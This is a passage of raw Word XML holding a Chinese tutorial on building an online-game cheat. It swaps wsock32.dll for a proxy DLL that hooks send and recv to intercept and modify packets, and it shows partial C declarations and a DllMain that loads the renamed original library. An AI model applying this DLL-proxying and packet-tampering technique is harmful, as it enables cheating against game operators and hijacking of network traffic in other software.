          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　众所周知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络编程接口，它工作于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用层，它提供与底层传输协议无关的高层数据传输编程接口。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口为应用程序提供基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的网络访问服务，这些服务是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wsock32.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库提供的函数库来完成的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由上说明可知，任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用程序都必须通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口访问网络，当然网络游戏程序也不例外。由此我们可以想象一下，如果我们可以控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口的话，那么控制游戏客户端程序与服务器之间的数据包也将易如反掌。按着这个思路，下面的工作就是如何完成控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口了。由上面的介绍可知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口其实是由一个动态链接库提供的一系列函数，由这些函数实现对网络的访问。有了这层的认识，问题就好办多了，我们可以制作一个类似的动态链接库来代替原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口库，在其中实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中实现的所有函数，并保证所有函数的参数个数和顺序、返回值类型都应与原库相同。在这个自制作的动态库中，可以对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我们感兴趣的函数（如发送、接收等函数）进行挡截，放入外挂控制代码，最后还继续调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中提供的相应功能函数，这样就可以实现对网络数据包的挡截、修改和发送等封包功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面重点介绍创建挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外挂程序的基本步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win32 Dynamic-Link Library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>An empty DLL project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，按如下步骤输入代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入相关变量声明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HMODULE hModule=NULL; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块句柄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char buffer[1000]; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FARPROC proc; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数入口指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义指向原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中的所有函数地址的指针变量，因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库共提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多个函数，限于篇幅，在此就只选择几个常用的函数列出，有关这些库函数的说明可参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义指向原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库函数地址的指针变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOCKET (__stdcall *socket1)(int ,int,int);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(__stdcall *WSAStartup1)(WORD,LPWSADATA);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(__stdcall *WSACleanup1)();//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int (__stdcall *recv1)(SOCKET ,char FAR * ,int ,int );//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收数据函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int (__stdcall *send1)(SOCKET ,const char * ,int ,int);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送数据函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int (__stdcall *connect1)(SOCKET,const struct sockaddr *,int);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建连接函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int (__stdcall *bind1)(SOCKET ,const struct sockaddr *,int );//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它函数地址指针的定义略。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，按如下步骤输入代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入相关头文件声明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#include "wsock32.h" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DllMain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，在此函数中首先需要加载原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，并获取此库中所有函数的地址。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BOOL WINAPI DllMain (HANDLE hInst,ULONG ul_reason_for_call,LPVOID lpReserved)</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if(hModule==NULL){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库已复制为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hModule=LoadLibrary("wsock32.001"); </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else return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中的所有函数的地址并保存，下面仅列出部分代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if(hModule&amp;#33;=NULL){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
